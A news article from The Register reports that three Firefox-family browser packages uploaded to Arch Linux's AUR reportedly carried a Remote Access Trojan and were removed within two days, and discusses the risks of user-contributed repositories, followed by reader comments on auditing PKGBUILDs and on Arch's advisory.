Arch Linux users told to purge Firefox forks after AUR malware scare
- Reference: 1753206194
- News link: https://www.theregister.co.uk/2025/07/22/arch_aur_browsers_compromised/
- Source link:
A [1]security warning from the Arch Linux maintainers highlights compromised packages of three of the leading Firefox-based browsers in the AUR. The distro hasn't been breached. Unfortunately, the attack is a consequence of how Arch's repositories are structured and maintained.
The warning concerns three browsers from the greater Mozilla family: Firefox itself; a fork called [2]LibreWolf , which removes some Mozilla telemetry and otherwise tightens up Firefox's security and privacy a bit more; and the fancy tiling [3]Zen browser , which [4]we looked at last year .
[5]
All three had compromised packages contributed to the [6]AUR on July 16. The compromised packages were called librewolf-fix-bin , firefox-patch-bin , and zen-browser-patched-bin , and the modified versions reportedly contained a Remote Access Trojan (RAT). Less than two days later, the affected packages were identified and removed. If you installed them, then remove them immediately and then reboot. The official advice is to "take the necessary measures in order to ensure they were not compromised" – which is absolutely correct as far as it goes. The problem is, of course, that you need to have considerable Linux expertise to check for extra unknown processes running on your machine, or for extra traffic going through your firewall.
[7]
[8]
Arch is not one of the big-name distros, but it is one of the most used. As we reported last year, [9]about twice as many gamers use it as Ubuntu . This may in part be because Valve's Steam Deck runs it. [10]SteamOS 3 is based on Arch , and the company has been investing serious effort into improving the base OS.
The reason you don't hear about Arch quite so much is because the companies that make most of the noise in the Linux world, issue fancy surveys and so on, are mainly enterprise vendors. As a community-maintained rolling-release distro, Arch is the opposite.
[11]
This appeals to enthusiasts who have dabbled for a while and acquired some Linux knowledge. Arch has only a rudimentary installation program, and you have to install most of the components of your OS yourself. This gives certain types of user warm, fuzzy feelings of ownership and control.
It does make it harder to get a complete fully functional OS up and running, though, which is why there are multiple easier distros based upon Arch, but bundled with nice, easy graphical installers. As examples, we have looked at a few of these, including [12]EndeavourOS , [13]Garuda Linux , and [14]Manjaro .
Between official Arch and the remixes, plus Steam Deck users, there are a lot of Arch users out there – and most of them aren't likely to be used to conducting Linux security audits. Unfortunately, for non-techie Arch users who installed one of these browser packages, the most thorough solution is to back up all their stuff, reformat, and reinstall.
[15]
This is a snag of the way Arch works, but the "snag" is also one of the greatest strengths of the distro. Most distros only maintain official repositories with a restricted set of FOSS software. If you want an app that isn't in the official repos – which often means proprietary freeware such as Chrome, Zoom, Slack, Steam, and so on – then you must use some external source of software, such as one of the big-name cross-distro app stores: the Canonical-backed Snap Store, or the Red Hat-backed Flatpak system and Flathub.
[16]Please, FOSS world, we need something like ChromeOS
[17]Backup tool Rescuezilla resurrects itself across six Ubuntus
[18]PUTTY.ORG nothing to do with PuTTY – and now it's spouting pandemic piffle
[19]Open, free, and completely ignored: The strange afterlife of Symbian
The AUR is Arch's answer to this pickle. It's a special package repo where skilled Arch users who have packaged Linux apps for their own use can upload and share their contributions. The AUR is separate and distinct from the [20]main package repositories of the Arch project itself, which are called core , extra , and multilib , plus various testing repositories, and usually you must take some extra steps to add the AUR. On some Arch-based distros, you must use a different command to fetch software from the AUR, rather than the usual pacman command, which installs from the standard project repos.
So, as with so much in life, there's a balance. On the good side, with just one extra step (adding the AUR), Arch users gain access to native packages of almost any and every Linux app in the world. But on the bad side, lots of these packages come from a chaotic free-for-all source that is largely unpoliced and occasionally contains nasty surprises. This is not the first time someone's put malware in the AUR. The Register was reporting on it [21]way back in 2018 and there are a lot more Arch users now than then.
This is not a unique issue. The same year, The Reg [22]reported on malware in the Snap Store , and Canonical too [23]banished them in two days . Even so, we [24]reported on similar problems last year .
Other app stores have comparable issues. The bulk of Flathub's apps are not official packages, and when we [25]looked at Linux Mint 22 , we noted that its setting to only show verified packages on Flathub left a very sparse menu. Unofficial packages [26]caused problems for OBS Studio users on Fedora, too. Malware has also [27]cropped up on the Google Play Store , and [28]more than once .
There is no easy answer to this. There are bad people in the world and always will be. The Arch project isn't at any fault here. ®
Get our [29]Tech Resources
[1] https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/
[2] https://librewolf.net/
[3] https://zen-browser.app/
[4] https://www.theregister.com/2024/09/02/zen_firefox_fork_alpha/
[5] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_software/oses&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=2&c=2aIAJ6ufv4Vt4M14MboMkbAAAAEM&t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0
[6] https://aur.archlinux.org/
[7] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_software/oses&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44aIAJ6ufv4Vt4M14MboMkbAAAAEM&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0
[8] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_software/oses&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33aIAJ6ufv4Vt4M14MboMkbAAAAEM&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0
[9] https://www.theregister.com/2024/10/03/valve_sponsors_arch/
[10] https://www.theregister.com/2023/09/27/osseu_steam_os_3/
[11] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_software/oses&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44aIAJ6ufv4Vt4M14MboMkbAAAAEM&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0
[12] https://www.theregister.com/2022/06/29/endeavouros_artemis_226/
[13] https://www.theregister.com/2022/07/28/garuda_linux_arch_better/
[14] https://www.theregister.com/2024/05/24/manjaro_24_easier_arch/
[15] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_software/oses&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33aIAJ6ufv4Vt4M14MboMkbAAAAEM&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0
[16] https://www.theregister.com/2025/07/21/foss_chromeos_please/
[17] https://www.theregister.com/2025/07/18/rescuezilla_261/
[18] https://www.theregister.com/2025/07/17/puttyorg_website_controversy/
[19] https://www.theregister.com/2025/07/17/symbian_forgotten_foss_phone_os/
[20] https://wiki.archlinux.org/title/Official_repositories
[21] https://www.theregister.com/2018/07/11/someone_modified_arch_linuxs_acrobat_reader_adds_security_warning/
[22] https://www.theregister.com/2018/05/16/canonical_snaps_review_process_improvements_promised/
[23] https://www.theregister.com/2018/05/14/ubuntu_crypto_mining_apps/
[24] https://www.theregister.com/2024/03/28/canonical_snap_store_scams/
[25] https://www.theregister.com/2024/07/29/linus_mint_22_wilma/
[26] https://www.theregister.com/2025/02/25/fedora_obs_flatpak_dispute/
[27] https://www.theregister.com/2022/04/11/in_brief_security/
[28] https://www.theregister.com/2022/11/07/in_brief_security/
[29] https://whitepapers.theregister.com/
https://www.spacebar.news/stop-using-brave-browser/
https://thelibre.news/no-really-dont-use-brave/
Common sense should always be applied
I'm a long-time user of Arch (since about 2008) and don't use the AUR for much as the official repositories cover almost all of my needs. When I do install something from the AUR it's usually a development version of a package (-git) for testing/temporarily needing a bleeding-edge version for whatever reason and it's just a more convenient way of building something from source as it takes care of tracking dependencies for me. Still, the same pitfalls from manually building from source exist. And for someone who doesn't understand what they're doing, it can be like copy-pasting random commands found on SO and the like. Users should look at the listed upstream source and examine the PKGBUILD file to see if there's anything unusual there. And even then it's wise to be skeptical of these user-created packages as there's opportunity for all sorts of shenanigans as pointed out by this article. More popular packages do tend to get adopted officially by the distro in time, however, and user comments can be helpful as well.
"User-friendly" Arch derivatives don't do a good enough job of warning users of the potentially serious risks of enabling the AUR (or explaining what it is, really) in their graphical front ends either. I've encountered my fair share of newbies over the years who have mucked things up just by blindly installing things from the AUR. This breakage can be especially egregious in Manjaro as they arbitrarily hold back packages for weeks in their own repos and the AUR—obviously—assumes you're on regular Arch, running the latest stable packages. (Essentially, you're doing partial upgrades and that [1]goes against Arch's model .)
(Wholly unrelated but adding 'ILoveCandy' to your pacman.conf is a great little easter egg.)
[1] https://wiki.archlinux.org/title/System_maintenance#Partial_upgrades_are_unsupported
The official message from Arch is negligent
[1]The message doesn't say which versions of the packages or how one can tell the malware has been installed or even what malware it is.
Also, anyone can upload to AUR without checks. Brilliant design guys.
[1] https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/
Re: The official message from Arch is negligent
I think those entire packages are unsafe.
Re: The official message from Arch is negligent
They're not poisoned updates to the regular versions, they're completely separate versions. Firefox isn't even officially in the AUR, it's in the extra repo.
Arch Linux is not designed for casual users, and the AUR in particular is intended to be used sparingly. You should not be getting your browser from there unless you're willing to check the build scripts yourself.
Re: The official message from Arch is negligent
*completely separate packages.
Even better:
Delete them immediately and install Brave.